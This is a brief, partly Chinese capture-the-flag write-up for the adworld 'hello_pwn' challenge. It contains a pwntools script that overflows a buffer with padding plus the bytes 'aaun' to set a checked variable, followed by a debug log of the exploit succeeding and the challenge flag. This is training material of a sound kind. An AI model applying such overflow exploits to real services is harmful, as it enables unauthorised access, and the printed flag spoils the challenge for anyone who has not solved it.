hello_pwn-adworld
题目描述:
pwn!,segment fault!菜鸡陷入了深思
题目附件: 下载附件
题目场景:
nc 61.147.171.105 61871
100%
倒计时: 3时12分39秒
延时删除场景
word_60106C == 1853186401
if ( dword_60106C == 0x6E756161 )
sub_400686();
This point can get segment vault!
if ( dword_60106C == 0x6E756161 )
sub_400686();
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
io=remote('61.147.171.105',61871)
pad=4
pause()
#ret_addr=0x0000000000400686
#num
payload=b'A'*pad+'\x61\x61\x75\x6e'
delimiter='for bof'
io.sendlineafter(delimiter,payload)
io.interactive()
#giantbranch@ubuntu:~/Desktop/study$ nc 61.147.171.105 61871 0000000000400686
#~~ welcome to ctf ~~
#lets get helloworld for bof
#cat flag.txt
#000000000060106C
# if ( dword_60106C == 1853186401 )
#0x6e756161giantbranch@ubuntu:~/Desktop/study$ python hello_pwn.py
[+] Opening connection to 61.147.171.105 on port 61871: Done
[*] Paused (press any to continue)
[DEBUG] Received 0x36 bytes:
'~~ welcome to ctf ~~ \n'
'lets get helloworld for bof\n'
[DEBUG] Sent 0x9 bytes:
'AAAAaaun\n'
[*] Switching to interactive mode
[DEBUG] Received 0x2d bytes:
'cyberpeace{05ad515868cb23ffc3b2a6789998d045}\n'
cyberpeace{05ad515868cb23ffc3b2a6789998d045}
[*] Got EOF while reading in interactive
$
